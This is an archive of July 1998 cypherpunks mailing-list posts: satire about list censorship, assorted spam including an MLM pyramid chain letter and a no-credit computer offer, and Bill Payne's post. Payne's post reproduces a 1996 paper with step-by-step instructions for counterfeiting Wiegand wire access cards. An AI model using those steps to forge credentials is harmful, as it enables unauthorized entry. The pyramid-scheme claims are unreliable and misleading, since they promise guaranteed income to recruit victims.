information will be returned to sender. We are not mind readers nor are we 
omniscient. Also, applications which are illegible will be returned. We will not guess 
what is written on them.

3) Since there is no placement in this program there will be no orphan file created by 
placement problems. However, there could be occasions when someone sends in an 
application expecting their sponsor to do likewise, but he or she does not. We will 
hold the appplication for 5 business days, and if the sponsor application does not 
materialize, we will return the orphan application back to the sender.

4) Another situation which could sometimes happen is mail being lost. Here again, if 
the sponsor application does not arrive within 5 business days, we will be forced to 
return the orphan application.

5) We will always attempt to answer all questions in a timely and diligent fashion. 
However, we anticipate rapid growth and understand that there will be times when 
we cannot. We encourage you to get on the conference calls, or turn to your upline 
whenever you need information that you carmot get from the Company.

6) We will absolutely not tolerate any misrepresentation of our products or our 
program from any distributor. This will be grounds for immediate termination          
and loss of any revenue share.

7) Whenever we are about to release a new product into the matrix, we will notify 
everyone at least a month before. This notification will be as an announcement in   
your check envelope, with your cereal delivery, or as a fax on demand document.

8) Revenue share will only be paid on a product if you yourself own it. In other 
words, as we release different products into the matrix, if you do not own that 
product, you will not earn revenue share on it from downfine purchases. Remember, it 
is not a requirement to own all our products, but it will be your decision as to whether 
or not you wish to earn additional revenue share based on the new products,

9) You may note that on your genealogy reports, persons whom you sponsored 
yourself may show up as being sponsored by someone else. That is not a mistake in 
the program! In order for the computer to place people in the matrix, it must assign 
sponsorship. This does not take sponsorship away from you, but is merely the way in 
which the computer builds the matrix. When this occurs, you now become the 
enroller, which keeps the credit for personal sponsorship with you, where it belongs.

GOOD LUCK AND SEE YOU AT THE TOP!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Sat, 4 Jul 1998 06:34:50 -0700 (PDT)
To: cypherpunks@toad.com
Subject: CypherPunks CensorShip Crisis II - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <009C8A9E.8996F560.3@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


Beyond The Valley Of The Planet Of The Return Of The Son 
Of The Uncle Of The Mother Of All Censorship Crisies II
              SPACE ALIENS HIDE M DRUGS!!!
              _____________________________
                                                                            
     * To: cypherpunks@toad.com
     * Subject: Linda Reed--PCC West Campus CSC
       <lreed@west.cscwc.pima.edu>: Re: Army of Dog
       SPACE ALIENS HIDE M DRUGS!!!
     * From: one4evil@juno.com (Nalus Optic)
     * Date: Fri, 3 Jul 1998 10:49:09 -0700
     * Sender: owner-cypherpunks@Algebra.COM

I was asked to forward this message to the Cypherpunks list by Linda
Reed...Who sent it to me as a responce to one of my e-mails...I know that
by doing so, I risk being kicked, stomped, beated siverly amongst the
neck and shoulders, and even flamed...But I think so many of us are not
looking at the true messages involved in these 'spams'.  Reed is makeing
several REALL good points...Given, Reed does rant a bit...And some of
what is writen is just so much bullshit...But all of it, taken in
context, is Truth (TM)...
Let me make a suggestion to Reed and all others involved...There is a
time and place for everything...The time for rEvolution, as Reed puts it,
is _NOW!_ However, Cypherpunks is not the place...So does anyone know of
any good e-lists that would love to get the ALIANS posts?  Maybe your
five minute's of thought on a way to help Reed will make everyone happy,
Vs the hours some of us are spending complaining about the damn thing.

[Gnat From The Author:

 As the Author, We personally believe that <infinity.nus.sg>
 should forcefully unsubscibe itself from the CypherPunks 
 Distributed Node Mailing Lists, since it is the website
 which the Author is currently using to read the list posts.
 As well, We feel that Linda Reed <lreed@west.cscwc.pima.edu>
 should take steps to block her email account from being sent
 to any site on the InterNet, as it is being used, with or
 without her consent, to generate UCE/SPAM.
 In addition, We feel that all CypherPunks Distributed Node
 Mailing List members should forcefully unsubscribe themselves
 from the lists, as spammers, since it is enevitable that there
 is someone on the list who considers their posts irrelevant,
 off-topic, or SPAM, at one point or another.

 In the future, the Author would be happy to provide a filtered
 version of the CypherPunks Distributed Node Mailing List which
 would be distributed freely to all CypherPunks whose non-union
 dues are currently paid up to date.
 The filtered version would contain complete copies of all posts
 routed through the current CypherPunks Distributed Mailing List
 Nodes, without any deletions or censorship, in accordance with
 CypherPunks Goals and Traditions.

 For a slight extra fee, the Authors would also be happy to 
 provide special, Enhanced Editions of the CypherPunks Filtered
 Mailing List:
 1. ASCII Art Edition: Containing classic reprints of Timmy 
   C. Mayonnaise ASCII-Art SPAMS, complete with Forged Digital
   Signatures of Dr. Dimitri Vulis, KOTM, along with a Certificate
   of Genuine Authenticity Digitally Signed with the Electronic
   Forgery Foundation's Pretty Lousy Privacy Key.
 2. Censorship Crisis II Edition: Offers the convenience of
   recreating the original posts for and against censorship
   of the CypherPunks list, substiuting the names, email
   addresses and digital signatures of current list members,
   saving list members hours of rehashing old issues, while
   maintaining the emotionally volatile atmosphere regarding
   an argument that is logically ridiculous to argue about
   in the first place, given the nature of the CypherPunks 
   list.
    !!!PLUS!!! As An Added Bonus: (At No Extra Charge!)
   * A complete pro-censorship and anti-censorship thread
    dealing specifically with the SPAMing of SAHMD chapters
    to the CypherPunks list, with each post written and
    autographed the the Author HimOrHerSelf!
   * A Classic Collection of past posts by both legendary
    and long-forgotten CypherPunks, quoting and misquoting
    the "Doomed to Learn From the Mistakes of the Past" 
    (or whatever) quote.(A 5MB package, by itself, alone!)
   * A Superb Collection of Lame-AND/OR-Offensive Posts
    categorized under such headings as UNSCRIBIBVE, LAME,
    RACIST, CHILDISH, 'I BROKE PGP!', 'NEW UNBREAKABLE
    ENCRPTION ALGORERHTHM',          , RE:          ,
    STUPID, AOL, 'I THINK WE SHOULD ALL SEND TEN COPIES
    OF THIS POST BACK TO DIMITRI', and one of the all-time
    favorites of many Veteran Elitist CypherPunks List
    Members, 'TEST'.
 3. Pre-Checked Archive Edition: Each post is marked with
   a special flag to indicate whether or not the post is
   duplicative of a subject discussed, or a point made by,
   Tim C. May at some time in the history of the CypherPunks
   list, as well as a flag indicating whether or not the
   post agrees with Mr. May's past theories and views, so
   that they can be efficiently deleted in order not to
   waste the reader's time with BadInformation, one way
   or the other.

  Those pre-dating their orders for an Enhanced Edition
  of the Author's Filtered CypherPunks Mailing List to
  December 7, 1989, or forging Tim C. May's digital
  signature to their order, will receive copies of
  Nalus Optic's coming post to list, whining about how
  HisOrHer original post *NEVER* called for censorship,
  Tim C. May's future reply that this is obviously the
  work of that asshole, Toto, again, Robert Hettinga's
  future post that he *loves* this list, another post
  from Tim C. May, obviously forged by Toto, saying that
  he can't find his shoes *or* his goddamn dentures, and
  a variety of future posts from various list members 
  stating:
  "Just ignore him."
  "Don't you people have delete keys?"
  "Happy Fourth of July!"
  "I'm putting Toto back in my KillFile!"
  "I never took him out of mine, I just read his posts
   by accident when I read all of the posts in my KillFile,
   to make sure I'm not deleting anything important."
  "<Plonk!>"
  "Have a good Labor Day!"
  "Unscrrvive"
  "Unrivcribe cypherpunks <Lamer@AOL.COM>"
  "Unsvribe <Lamer@AOL.COM> cypherpunks"
  "Uncribive cypherpunks"
  "Unsrivribe <Lamer@AOL.COM>"
  "Merry Chrismas Everybody!"
  "Take me off this goddamn list!"
  "TAKE ME OFF THIS LIST! I MEAN IT!!!"
  "Happpy Holidays and a Happy New ear"
  "Please take me off this list, ok? Please, somebody?"
  "OK OU ASHOLES! IM GOING TO KEEP THIS UP UNTIL OU..."
  
 DISCLAIMER: The Author is in no way implying that those
 who do not wish to take advantage of this tremendous
 offer are not free to just contine their involvement in
 the Cypherpunks list and use methods of subscribing and 
 posting pretty much the same as they did before deleting 
 this offer without reading it.
 However, HeOrShe reserves the right to bill all who
 receive this offer the full amount of the CypherPunks
 current non-union dues, if this offer is not returned
 to the CypherPunks mailing list they received it from,
 in it's original condition, with full message headers,
 within thirty minutes or less of its original posting.]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: puudio96@prodigy.com
Date: Sat, 4 Jul 1998 04:35:24 -0700 (PDT)
To: puudio96@prodigy.com
Subject: Earn a NO COST Pentium 266 Computer!! EVERYONE Approved!!
Message-ID: <199807044322XAA19326@power.interserver.com.ar>
MIME-Version: 1.0
Content-Type: text/plain




What are YOUR answers to these questions??


Afraid your credit wouldn't allow you 
to get the computer you want?


Have you been wanting a new computer,
but were wondering if you can afford it?  



Do you want to learn more about:


**  The Internet
**  Your Computer
**  Building your own web sites for 
personal or business use
     and then selling them for a profit?


. but don't want to pay for those costly courses?


If you answered YES to one or more of these questions, then this is the
opportunity for YOU !!


Not only can you indulge yourself with a new computer (regardless of your
credit history)  
and provide yourself with ongoing, online education, 
you can also earn money doing so!!


Sound interesting???


HIT REPLY
and ask for more info!!! 


on this INCREDIBLE opportunity!!!!
Or Send Email To  
goodidea@dreamer.net


Everyone is accepted regardless of credit - 
even people who have filed bankruptcy!
Some specific Information on the computer itself...


Your "COMPUTER MANIA" package SHIPS WITH:  


NOW EVEN MORE UPGRADES
Microsoft Office 97 Professional (Pre-installed, licensed version, CD 
Rom Disk Included!!!) 266 MHZ Pentium Processor- Upgraded (from 200 MMX) on
All Shipments!!! 64 Meg 
SD-Ram, 10ns (Upgraded to SD Ram) 4.3 Gig IDE HD - Upgraded (from 2.1 
Gig) on All Shipments!!!
(4.0+ Gig available after preloaded software)  56k Flex - Fax Modem 
24X IDE CD Rom 4 Mb 64 bit SVGA Video (Upgraded from 2 Meg) 16 Bit 3d 
Stereo Sound (Upgraded to 3D) 80 Watt Amplified Speakers / Headphones / 
Microphone 512 L2 Cache w/ TX Pro Motherboard  15" SVGA Color Monitor,
1024x768 .28dp Mini Tower Case (Upgraded - Sturdy) 3.5 Floppy Drive
Keyboard and Mouse Windows 95 + 70 Software Titles 


 


Technical support provided by 1-800 #, by  Computer Support Line. 
  
ALSO INCLUDES: NEC 1000 printer: 
300x300 dpi Single Cartridge Prints 
B&W and Color 
Parallel Port Interface


WHAT ARE YOU WAITING FOR ?
EVERYONE IS APPROVED !!


HIT REPLY AND ASK FOR MORE INFO!!!
Or send email to  
goodidea@dream




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <vjb@gil.com.au>
Date: Fri, 3 Jul 1998 19:50:49 -0700 (PDT)
To: (Recipient list suppressed)
Subject: One Nation web site temporarily off-line
Message-ID: <1.5.4.32.19980704020846.0072baac@mail.ipswich.gil.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Dear One Nation supporter in NSW

You will note from my email that I am not using the normal gwb@gwb.com.au
address.

Last night at about 6.30pm Optus "pulled the plug" on my Internet Service
Provider (Pronet) who I have NOW been informed are facing financial
difficulties. (I only found out today after making enquiries as to why I
could not access my ISP.)

This has caused all contact with the "gwb" web sites (which includes One
Nation) to be cut off. If you try to contact them you will come up with a
"DNS error".

I am currently relocating the web site and will be seeking a new ISP who can
offer One Nation "the best deal". This will take some time, perhaps a few
days, and in the mean time I apologise for any inconvenience.

As soon as the One Nation website is up and running I will advise you.

Please note that the Internet address will remain the same as it was.

In the meantime be assured that One Nation being "off air" is not related to
any conspiracy, lack of support from our part or any other misinformation
that might be fed to you through the media.

As always GWB stands 100% behind Pauline Hanson and her competent team.

GWB



Scott Balson





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Sat, 4 Jul 1998 12:58:21 -0700 (PDT)
To: ukcrypto@maillist.ox.ac.uk
Subject: NSA , FBI, and Sandia labs - and stolen weapons
Message-ID: <359E887A.6EDB@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Saturday 7/4/98 1:20 PM

Laszlo Baranyi

I read http://www.qainfo.se/~lb/crypto_ag.htm

I will look in my files for a paper published in the Association
of Computing Machinery authored by G. J. Simmons on the COVERT CHANNEL.  
Then e-mail you an exact reference.

Information FORCED on me by Sandian James Gosler funded by NSA was about
the COVERT CHANNEL.  Similar to what I read at
http://www.aci.net/kalliste/ricono.htm

Gosler made the point to us that the 'black hats' could spike a device,
either through hardware or software.

A 'white hat' group  could not discover how the covert channel worked
[was spiked].

Gosler later wanted to assign me to an NSA project. I refused. I would
not sign the required papers - which effectively makes the signer give
up their civil rights.

See http://www.qainfo.se/~lb/crypto_ag.htm
 
 RIGGING THE GAME" Baltimore Sun, December 10, 1995. This article can be
ordered on-line
 http://www.sunspot.net/archive/search/

for details what NSA requires employees to sign.

Sandia reassigned me to break electronic locks for the FBI.
http://www.fbi.gov/
and http://www.fbi.gov/fo/nyfo/nytwa.htm 

I attach results, which the FBI blieves is SECRET/NSI, on how to
counterfeit Wiegand wire access 
credentials funded by the FBI.

Perhaps the following quotation and reference might be valuable to
you.

             Spy agencies are also dabbling in hacker warfare.  The 
             National Security Agency, along with top-secret
intelligence 
             units in the Army,  Air Force, has been researching 
             ways to infect enemy computer systems with particularly 
             virulent strains of software viruses that already plague
home 
             and office computers.  Another type of virus, the logic
bomb, 
             would remain dormant in an enemy system until a
predetermined 
             time, when it would come to life and begin eating data. 
Such 
             bombs could attack, for example, a nation's air-defense
system 
             or central bank.  The CIA has a clandestine program that 
             would insert booby-trapped computer chips into weapons
systems 
             that a foreign arms manufacturer might ship to a
potentially 
             hostile country - a technique called "chipping".  In
another 
             program, the agency is looking at how independent
contractors 
             hired by arms makers to write software for weapons systems 
             could be bribed to slip in viruses. 
 
             "You get into the arms manufacturer's supply network, 
             take the stuff off-line briefly, insert the bug, the let it
go 
             to the country," explained a CIA source who specializes in 
             information technology.  "When the weapons system goes into
a 
             hostile situation, everything about it seems to work, but
the 
             warhead doesn't explode." 
 
              
             weapons may be even more exotic than computer viruses. 
             Los Alamos National Laboratory in New Mexico has developed
a 
             suitcase-sized device that generates a high-powered 
             electromagnetic pulse.  Commandos could sneak into a
foreign 
             capitol, place the EMP suitcase next to a bank and set it
off. 
             The resulting pulse would burn out all electronic
components 
             in the building. ... 
 
        [TIME, August 21, 1995, by Douglas Waller] 

The US was super-concerned when stinger missiles, AFTER THE US GAVE THEM
TO THE AFGHANIS, that the stingers might be used against the US.  

So the idea is to spike weapons so that the US remains in ELECTRONIC
CONTROL - if physical
control is lost.  

There are, of course, hazards in powering-up a stolen foreign weapon.

My wife Patty [Implementing Basics : How Basics Work William H. and
Patricia Payne / 
Published 1982 http://www.amazon.com]and I were in Zurich in April 
1997.  

I spoke to Hans Buehler on the phone from the airpont.

Buehler gave me ideas on how to get my case settled TOO.

I JUST WANT MY MONEY AND OUT OF THIS MESS! 
http://www.jya.com/sec062998.htm

Best.   And I look forward to reading more about what you discover.
bill

http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2

http://www-hto.usc.edu/software/seqaln/doc/html/gfsr.3.html

Coauthor Lewis in the above is one of my former MS and PhD students in
computer science.

http://www.friction-free-economy.com/


Counterfeiting Wiegand Wire Access Credentials
     
                                   Bill Payne
     
                                 October 16,1996
     
                                    Abstract
     
                  Wiegand wire access credentials are easy and
                  inexpensive to counterfeit.
     
        Access Control & Security Systems Integration magazine, October
        1996 [http://www/securitysolutions.com] published the article,
     
             Wiegand technology stands the test of time
     
             by PAUL J. BODELL, page 12
     
             Many card and reader manufacturers offer Wiegand (pronounced
             wee-gand) output.  However, only three companies in the
             world make Wiegand readers.  Sensor Engineering of Hamden
             Conn., holds the patent for Wiegand, and Sensor has licensed
             Cardkey of Simi Valley, Calif., and Doduco of Pforzheim,
             Germany, to manufacture Wiegand cards and readers. ...  A
             Wiegand output reader is not the same thing as a Wiegand
             reader,  and it is important to understand the differences.
     
                In brief, Wiegand reader use the Wiegand effect to
             translate card information around the patented Wiegand
             effect in which a segment of a specially treated wire
             generates an electronic pulse when subjected to a specific
             magnetic field.  If the pulse is generated when the wire is
             near a pick-up coil, the pulse can be detected by a circuit.
             Lining up several rows of wires and passing them by a cold
             would generate a series of pulses.  Lining up two rows of
             wires - calling on row "zero bits" and the other "one bits"
             - and passing them by two different coils would generate two
             series of pulses, or data bits.  These data bits can then be
             interpreted as binary data and used to control other
             devices.  If you seal the coils in a rugged housing with
             properly placed magnets, and LED and some simple circuitry,
             you have a Wiegand reader.  Carefully laminate the special
             wires in vinyl, and artwork, and hot-stamp a number on the
             vinyl, and you have a Wiegand card.
     
             IN THE BEGINNING
     
               Wiegand was first to introduce to the access control
             market in the late 1970s.  It was immediately successful
             because it filled the need for durable, secure card and
             reader technology.
               Embedded in the cards, Wiegand wires cannot be altered or
             duplicated. ...
     
        Bodell's Last statement is incorrect.
     
        Tasks for EASILY counterfeiting Wiegand wire cards are
     
        1    Locate the wires inside the card to read the 0s and 1s.
     
        2    Build an ACCEPTABLE copy of the card.
     
        Bodell's clear explanation of the working of a Wiegand card can
        be visualized
     
             zero row    |     |   |
     
             one row        |          |
     
             binary      0  1  0   0   1
             representation
     
        Solutions to Task 1
     
             A    X-ray the card
     
             B    MAGNI VIEW FILM,  Mylar film reads magnetic fields ...
                  Edmunds Scientific Company, catalog 16N1, page
                  205, C33,447  $11.75
     
        is placed over the top of the Wiegand card.
     
        COW MAGNET,  Cow magnetics allow farmers to trap metal in the
        stomachs of their cows.  Edmunds, page 204, C31,101 $10.75
        is placed under the card.
     
        Location of the wires is easily seen on the green film.
     
        Mark the position of the wires with a pen.
     
        Next chop the card vertically using a shear into about 80/1000s
        paper-match-sized strips.
     
        Don't worry about cutting a wire or two.
     
        Note that a 0 has the pen mark to the top.  A 1 has the pen mark
        at the bottom.
     
        Take a business card and layout the "paper match"-like strips to
        counterfeit the card number desired.
     
        Don't worry about spacing.  Wiegand output is self-clocking!
     
        Tape the "paper-match - like" strips to the business card.
     
        Only the FUNCTION of the card needs to be reproduced!
     
                                     History
     
        Breaking electronic locks was done as "work for others" at Sandia
     
        National Laboratories beginning in 1992 funded by the Federal
        Bureau of Investigation/Engineering Research Facility, Quantico,
        VA.
     
        The FBI opined that this work was SECRET/NATIONAL SECURITY
        INFORMATION.
     
        Details of the consequences of this work are covered in
     
             Fired Worker File Lawsuit Against Sandia
             Specialist Says He Balked When Lab Sought Electronic
             Picklock Software, Albuquer Journal, Sunday April 25, 1993
     
             State-sanctioned paranoia,  EE Times, January 22, 1996
     
             One man's battle,  EE Times, March 22, 1994
     
             Damn the torpedoes,  EE Times, June 6, 1994
     
             Protecting properly classified info,  EE Times, April 11,
             1994
     
             DOE to scrutinize fairness in old whistle-blower cases,
             Albuquerque Tribune, Nov 7 1995
     
             DOE boss accelerates whistle-blower protection,  Albuquerque
             Tribune, March 27, 1996
     
             DOE doesn't plan to compensate 'old' whistle-blowers with
             money, Albuquerque Tribune September 27, 199




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mts2@volg15.mmtel.msk.su
Date: Fri, 3 Jul 1998 22:18:46 -0700 (PDT)
To: Customer@yourplace.com
Subject: YOUR CLASSIFIED - AD / 333  NEWSPAPERS   !!!!!!!!!
Message-ID: <199807040527.OAA01790@axp3400.kyungpook.ac.kr>
MIME-Version: 1.0
Content-Type: text/plain



YOUR AD IN 333 NEWSPAPERS !!!!!!!!!!
***********************************************

         Seven years ago, I learned how to place my Classified Ad in
several hundred newspapers, with just one telephone call.  And, my
cost was $0.51 per newspaper.  The total circulation was well over
1.5 Million.  I could reach just about any market, anywhere in this
country.  Since then, my small mail-order company has exploded.
And, I use this same time tested and true method week after week.

         I would like to share this powerful information and show you
how to save hundreds, even thousands of dollars on advertising that
works.  The average cost of a classified ad in a newspaper is about
$15.00 to $20.00 dollars.  Multiply that by 333 and your total cost is
well over $6,000.00 Dollars.  By using our amazing method, your
total cost is only $170.00.  Not to mention the time and money you
save by placing one call, instead of 333 long distance calls.

          You can limit your promotion to a Single State or place your
ad in Several States around the country, all with just one phone call.
You can reach One Million Readers on the East-Cost today and a
Million on the West-Coast tomorrow.  It's that simple  !!!!

            Your cost for this priceless information, is only $17.00 !!!  
You will make that back on your first promotion.  WE are so confident that
this type of advertising will boost your profits, we will guarantee your
satisfaction with our Money Back Guarantee !!  So, you have nothing
to lose.  Now, order our amazing classified ad method today !!!!!! 


                                PRINT ORDER FORM
Ship To:                    **************************
*********
NAME____________________________________________

ADDRESS________________________________________

CITY______________________________________________

STATE__________________    ZIP_____________________

E-MAIL__________________________________

Don't Delay,   ORDER TODAY!!!!!!!

**********************************************************************
Mail Payment  $17.00  CASH,  money order,  or check  TO:
********************
 
                                  INFORMATION, Ltd.
                                  P. O. Box  515019 
                                  St. Louis, MO 63151-5019  
                                  U.S.A.

WE will ship your complete KIT directly to you !!!!
 

**************************************************************
OPTIONAL / OVERNIGHT SHIPPING - ADD $15.00
**************************************************************
                          
Thank you for your kind attention, and have a nice day !!!



++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Admin
Internet Services
This message is not intended for residents in the 
State of Washington, screening of addresses has been done
to the best of our technical ability.
If you are a Washington resident or otherwise wish to be
removed from this list, go to global remove site if you want
your address removed from future mailing. 
http://209.84.246.162/remove.htm
 
This Global Communication has been sent to you by:
PAVILION INTERNATIONAL SERVICES
Offices:  London, Paris, Berlin, Hong Kong


















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Sat, 4 Jul 1998 19:52:34 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Daily News Fri 3 Jul '98
Message-ID: <19980705021020.20755.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/html

New: STUFFED - the News & Babes Daily!

<img src=http://stuffed.net/98/7/3/cover.gif
width=300 height=380 border=0 alt='Click Here For STUFFED, The NEW Daily Tabloid
 News And Babes Color Supplement From Eureka!'>

Click here to read it: http://stuffed.net/98/7/3/



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Sat, 4 Jul 1998 23:49:38 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Daily News Sat Jul 4 '98
Message-ID: <19980705043205.15645.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/html

New: STUFFED - the News & Babes Daily!

<img src=http://stuffed.net/98/7/4/cover.gif
width=300 height=380 border=0 alt='Click Here For STUFFED, The NEW Daily Tabloid
 News And Babes Color Supplement From Eureka!'>

Click here to read it: http://stuffed.net/98/7/4/



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Sun, 5 Jul 1998 05:51:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: corvette/BXA
Message-ID: <Pine.LNX.3.96.980705083919.28118A-100000@ismene>
MIME-Version: 1.0
Content-Type: text/plain


For all those watching the watchers, BXA recently changed their
configuration. corvette.bxa.doc.gov is now known as jade.bxa.doc.gov.
The IP addresses are different, but look at the configuration.. looks
like they just swapped two machines:

$ ftp corvette.bxa.doc.gov
Connected to corvette.bxa.doc.gov.
220-Proxy first requires authentication
220 jade FTP proxy (Version 2.0) ready.
Name (corvette.bxa.doc.gov:anonymous):

$ ftp jade.bxa.doc.gov
Connected to jade.bxa.doc.gov.
220-Proxy first requires authentication
220 corvette.bxa.doc.gov FTP proxy (Version 3.2) ready.
Name (jade.bxa.doc.gov:anonymous):

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
"..the isle is full of noises, sounds and sweet airs that give delight and
hurt not. Sometimes a thousand twangling instruments will hum about mine
ears, and sometimes voices.." Caliban, Shakespeare's "The Tempest"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rj5d@geocities.com
Date: Sun, 5 Jul 1998 06:13:00 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Llama al exterior a mitad de precio
Message-ID: <13579305_69336672>
MIME-Version: 1.0
Content-Type: text/plain




05/07/1998
You can read de same message in Spanish at the bottom
Ud. puede leer el mismo mensaje en Castellano donde finaliza en ingles.
LLamadas al exterior hasta 80% ms baratas y gratis a los 0800
========================================================================
This FREE software as opposed to the other products, allows the user to call a normal telephone anywhere in the world realizing fantastic savings.
========================================================================
You call toll free numbers in the United States or Canada from anywhere in the world, free.

This software is the newest technological breakthrough in telecommunications that makes possible long distance calls from your computer to any telephone in the world. We are the representatives of a software that is worldwide leader and uses the most advanced Internet telephony system available today by a long shot.

Most communications applications over the Internet, allow voice and even video transmittal, require that both the originator and the recipient of the call have fast, multimedia-ready computers, connected to the Internet at the same time and running the same communications software. Products like Net Meeting and Internet Phone are very sophisticated, but are not telephony applications.

You can call anywhere in the world by means of a multimedia computer and a Dial-up Internet service. The call is initiated from your computer after you connect to your Internet Service Provider (ISP) and is then transmitted through the web into a telephony central switch in the US. The switch instantly and automatically completes the call via the US public telephony network and through it reaches its final destination. The result is a real-time call, uninterrupted and full-duplex.


What are the benefits?

It reduces the cost of long distance calls by as much as 95% or even 100% when dialing into a toll-free (1-800 or 1-888) number in the US and Canada. For more information please refer to our home page at:

http://members.tripod.com/~rksistemas   and  

http://www.visitweb.com/rksistemas

Rates are completely independent from the country of origin of the call. In fact, all calls originate in reality from the US, signifying that World Wide users will actually call the world using US rates, currently the most competitive in the world.

Any telephone in the world may be called via a computer and a modem. This renders PC to PC technologies useless since they require both users to be connected to the Internet, have multimedia computers, the same software running and meet in the same place at the same time.

Visit us and download free the software at:


http://members.tripod.com/~rksistemas   and  

http://www.visitweb.com/rksistemas

or send your mail for questions to   rksis@geocities.com

Thanks

=====================================================
SPANISH VERSION - SPANISH VERSION - SPANISH VERSION -
=====================================================
LLamadas al exterior hasta 80% ms baratas y gratis a los 0800

Como funciona ?     usalo y ahorr  

El destinatario no tiene que estar usando su PC sino que llams directo a su telfono. Cualquier usuario de Internet, con una computadora multimedia, puede iniciar llamadas desde su PC a cualquier telfono del mundo pero con tarifas que son increbles.   
Esto no es la charla por voz en Internet. No hay que ponerse de acuerdo ni nada,  discs con la PC y listo, as de fcil suena el telfono de quien ests llamando.
-------------------------------------------------------
ADEMS LLAMS GRATIS A TODOS LOS 0800 DE EE.UU Y CANAD
-------------------------------------------------------
Bajte el software gratuitamente,  problo y ya que ests consult todos los servicios que ofrecemos

http://members.tripod.com/~rksistemas   y de

http://www.visitweb.com/rksistemas

Podes tener  "privacidad en tus llamadas",  porque a donde sea que llames, en nuestro pas slo queda registrada la llamada local a tu proveedor de Internet, y la llamada se origina desde EE.UU. a la tarifa ms competitiva del mercado.

La tecnologa de este software incorpora los ms recientes avances tcnicos en materia de comunicaciones. Para realizar una comunicacin a cualquier lugar del mundo, te conects a tu proveedor de Internet y mediante el software (que lo podes bajar gratuitamente de nuestra Web) te conects a un servidor en Nueva Jersey y este, de manera automtica e instantnea entrega la llamada a la red pblica de telfonos de los Estados Unidos. 

El destinatario no necesita tener una conexin a un proveedor de Internet

Para vos es tan simple que discs en la pantalla usando el software y se llega al destino final, el telfono marcado. 

El resultado es una llamada en tiempo real, full-dplex (doble va: hablo y escucho a la vez) entre dos personas. 

Debido a que la seal es enviada por el Internet en el primer tramo del trayecto, hasta llegar a la central, las tarifas se vuelven independientes del pas de origen.   

Consult los productos y servicios que ofrecemos y bajate el soft gratuitamente y probalo desde

http://members.tripod.com/~rksistemas   y de

http://www.visitweb.com/rksistemas

Por consultas:  e-mail:  rksis@geocities.com

Gracias.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Freedom<Yours@HCHY.Now.com>
Date: Sun, 5 Jul 1998 18:10:28 -0700 (PDT)
To: Freedom.AQVX@toad.com
Subject: Freedom Is Not Free! -PBKF
Message-ID: <199807060110.SAA03549@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


FREEDOM REQUIRES MONEY!!
I know what you are thinking "Another one of those Scams!" Well guess what? You're 
Wrong!  Have you ever invested in the stock market, gone into business for yourself, 
made a friendly wager on a game or played the lottery. I think that most of us have 
gambled on one thing or another. This is so easy! This is truly the easiest and most 
effective way of making money I've ever seen! YOU HAVE SO LITTLE TO LOSE AND SO 
MUCH TO GAIN! Please print this and read it carefully. You'll be glade you did!  
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

This is a , LOW-COST,PHENOMENON.
PRINT this letter, read the directions, THEN             
GET STARTED TODAY! 

You are about to embark on the most profitable and unique 
program you may ever see.  Many times over, it has 
demonstrated and proven its ability to generate large amounts 
of CASH. This program is showing fantastic appeal with a 
huge and ever-growing on-line population desirous of 
additional income.

This is a legitimate, LEGAL, money-making opportunity.  
It does not require you to come in contact with 
people, do any hard work, and best of all, you 
never have to leave the house, except to get 
the mail and go to the bank!

This truly is that lucky break you've been waiting for! 
Simply follow the easy instructions in this letter, 
and your financial dreams <U>will</U> come true! 
When followed correctly, this electronic, multi-level marketing program 
works perfectly... 100% OF THE TIME!

Thousands of people have used this 
program to:

Raise capital to start their own business
Pay off debts
Buy homes, cars, etc.,
Even retire!

This is your chance, so read on and get started today!
---------------------------------------------------------
-------------------------
OVERVIEW OF THIS EXTRAORDINARY 
ELECTRONIC MULTI-LEVEL MARKETING PROGRAM
----------------------------------------------------------------------
------
------

Basically, this is what we do:
We send thousands of people a product for $5.00 that 
costs next to nothing to produce and e-mail. As with 
all multi-level businesses, we build our business by 
recruiting new partners and selling our products.  Every 
state in the U.S. allows you to recruit new multi- level 
business online (via your computer).

The products in this program are a series of four business 
and financial reports costing $5.00 each.  Each order you 
receive via "snail mail" will include:

$5.00 cash
The name and number of the report they are ordering
The e-mail address where you will e-mail them the report they ordered.

To fill each order, you simply e-mail the product to the buyer. The $5.00 is yours!   
This is the EASIEST electronic multi-level marketing business 
anywhere! 

FOLLOW THE INSTRUCTIONS TO THE LETTER AND BE PREPARED TO REAP THE 
BENEFITS!

                              ******* 
I  N  S  T  R  U  C  T  I  O  N  S
                              *******
This is what you MUST do:
1.	Order all 4 reports shown on the list below (you can't sell 
them if you 
don't order them).
